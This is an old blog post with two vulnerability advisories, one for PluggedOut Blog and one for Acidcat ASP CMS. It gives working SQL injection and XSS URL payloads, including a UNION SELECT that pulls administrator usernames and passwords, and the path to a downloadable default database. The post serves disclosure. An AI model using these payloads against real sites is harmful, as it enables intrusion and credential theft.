Monday, July 10, 2006

 

PluggedOut Blog SQL INJECTION and XSS

PluggedOut Blog SQL INJECTION and XSS

PluggedOut Blog is an open source script you can run on your web server to give
you an online multi-user journal or diary.
It can be used equally well for any kind of calendar application.Rather than
give you a thousand things you don't really want ...
PluggedOut Blog : http://www.pluggedout.com/

Credit:
The information has been provided by Hamid Ebadi (Hamid Network Security Team):
admin@hamid.ir
The original article can be found at:
http://hamid.ir/security/

Vulnerable Systems:
PluggedOut Blog Version : Version: 1.9.9c (2006-01-13)

example :
The following URL can be used to trigger an SQL injection vulnerability in the exec.php:
http://[PluggedOut Blog]/exec.php?action=comment_add&entryid=[SQL INJECTION]

and XSS
http://[PluggedOut Blog]/problem.php?id=1&data=>script<alert
('Hamid Network Security Team --> http://hamid.ir');alert(document.cookie)>/script<


 

Acidcat ASP CMS Multiple Vulnerabilities

Acidcat CMS is a web site and simple content management system that can be administered via a web browser.
It is free for non-commercial use.Acidcat CMS is also an open source product.
The product has been found to contain multiple security vulnerabilities allowing a remote attacker to find administrator username and password.
Acidcat ASP CMS :http://www.acidcat.com

Credit:
The information has been provided by Hamid Ebadi (Hamid Network Security Team):admin@hamid.ir.
The original article can be found at: http://hamid.ir/security/

Vulnerable Systems:
* Acidcat CMS v 2.1.13 and below
Example :
The following URL can be used to trigger an SQL injection vulnerability in the main_content.asp page: http://localhost/acidcat/default.asp?ID=1'

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression 'ID = 1'''.
/main_content.asp, line 16

Vulnerable Code:
The following lines in main_content.asp
Item.Source = "SELECT * FROM Item WHERE ID = "+ Item__MMColParam.replace(/'/g, "''") + "";


Exploit:
The following URL will illustrate how you can easily find administrator username and password by entering the following URL:

http://localhost/acidcat/default.asp?ID=26 union select 1,username,3,password,5,6 from Configuration
The base path of the login is :
http://localhost/acidcat/main_login.asp


Database Download:
The database can be downloaded over the web (default installation).it can be found on http://localhost/acidcat/databases/acidcat.mdb

This page is powered by Blogger. Isn't yours?